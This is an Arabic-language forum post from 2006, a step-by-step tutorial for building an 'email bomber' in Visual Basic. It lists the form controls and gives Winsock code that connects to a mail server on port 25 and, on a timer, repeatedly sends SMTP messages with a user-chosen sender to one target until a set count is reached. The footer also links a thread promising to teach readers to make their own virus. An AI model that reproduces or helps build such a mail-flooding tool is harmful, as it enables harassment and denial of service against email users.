xpredo script

العودة   نيو حب > منتديات الحاسب والاتصالات > تحميل برامج - برامج كامله - برامج مجانية > شرح البرامج - برامج مشروحه
التسجيل

تعلم برمجة برنامج ضرب البريد الكتروني بالصورة

شرح البرامج - برامج مشروحه

26-04-2006, 10:02 PM
sweety byby
 
Thumbs up تعلم برمجة برنامج ضرب البريد الكتروني بالصورة

بسم الله الرحمن الرحيم سنتعلم في هذا الدرس برمجة برنامج ضرب البريد طبعا بصورة

وعلى خطوه خطو وبرتيب


كل ما نريده في هذا البرمجة هو برنامج الفيجوال بيسك زي ما يعتمد العقرب الأسود

على برنامج الفيجوال بيسك

وكيف يتم أدراج كل أداء في الفيجوال بيسك

كل سنخضة على هذا الموضوع على خطوه خطوة


اولا نتعرف على الكواد وكيفية أدراج الكواد
"""""""""""""""""""""""""""""""""""""""""""""" """" """"""""""

لصنع برنامج ضرب إيميلات نحتاج إلى التالي :
فورم1 - أداة Winsock - و Timer
نضع داخل الفورم:
- مربع نص ونضع لكل مربع نص ليبل لتعريفه
ليبل 1 : المضيف ( مثل mail.hotmail.com )
ليبل 2 : المرسل
ليبل 3 : المستقبل
ليبل 4 : العنوان
ليبل 5 : النص ( ويكون هذا المربع كبير واجعل خاصية multline = True )
ليبل 6 : عدد الرسائل المراد ارسالها .

- أزرار (3)
الأول : بدء الضرب
الثاني : إيقاف الضرب
الثالث : اغلاق

والآن لنضع الأكواد :

عند بدء الضرب سيتم الاتصال عبر الوينسوك بالمضيف بالكود التالي:
Winsock1.connect text1 , 25
ملاحظة : هكذا سيتصل بالمضيف الخاص بالهوتميل والرقم هو منفذ الإرسال.
الآن سوف يتم الاتصال بمضيف الهوتميل

وللتأكد من الإتصال سوف نجعل عملية الإرسال تبدأ حين وصول رد المضيف :
اضغط على أداة الوينسوك مرتين واذهب إلى الحدث DataArrival
واكتب فيها :
timer1.enabled = True
وعليك جعل خاصية enabled في التيمر = False
والآن سنذهب للتيمر
عمل التيمر هو ارسال الرسائل للبريد ، وسوف يتم تكراره إلى أن يكتمل عدد الرسائل ، وسرعته لا يجب أن تزيد إلا مع الاتصال السريع ، ومع الاتصال المتوسط سوف نجعله يرسل كل نصف ثانية (500)

وهذا هو كود إرسال الرسائل:


Winsock1.SendData "MAIL FROM:" & text2 & vbNewLine
Winsock1.SendData "RCPT TO:" & Text3 & vbNewLine
Winsock1.SendData "DATA" & vbNewLine
Dim MSG As String
MSG = "From:" & Text2 & vbNewLine & "Date: " & _
Now & vbNewLine & "To:" & Text3 & vbNewLine & _
"Subject: " & Text4 & vbNewLine & vbNewLine & _
Text5 & vbNewLine
Winsock1.SendData MSG
Winsock1.SendData vbNewLine & vbNewLine & "." & vbNewLine & vbNewLine

وهكذا فإن البرنامج سوف يستمر بالضرب دون توقف ، ولإيقافه تحتاج لهذا الكود في التيمر
Dr = Dr + 1
if Dr = Text6 Then
timer1.enabled = false
end if
وضع داخل الحدث Form load التالي :
Dr = 0
وداخل مديول التالي :
Public Dr as long

"""""""""""""""""""""""""""""""""""""""""""""" """" """""""
نشوف الصور الان وبعدين بنعرف كل كود اين نضعه
::::""""""""""""""::::::::::::::::::::::::::::::"" """"""""""""""""""

صوره رقم و1


صورة رقم 2







تابع


أنقر بزر الأيمن من المواس وبعدين أختار مكونات وشوف الصورة













والى هنا أنتهيناء من الدرس الأول

وانشاءالله أنتظر الدرس التاني

تحياتيتعلم برمجة برنامج ضرب البريد الكتروني بالصورة
من مواضيع : sweety byby اليوم بقدم لكم طريقة مضمونة 100% وهى انك تصنع بنفسك فيرس
كيف نضيف الحركات للصور والنصوص في برنامج البوربوينت
هل تعانى من بطء فى جهازك؟... شرح تسريع الجهاز بدون برامج
الدرس الرابع من احتراف الشبكات
ملفات التجسس النصية
 

الكلمات الدلالية (Tags)
البريد, الكترونى, بالصورة, برمجة, برنامج, تعلم, ضرب

أدوات الموضوع

الانتقال السريع

المواضيع المتشابهه
مصطلحات الحاسوب مترجمة من الانجليزية للعربية 1
اروع برامج للمحمول
فن التعامل مع جوجل و كل ما تود معرفت

تعلم برمجة برنامج ضرب البريد الكتروني بالصورة

الساعة الآن 08:42 PM.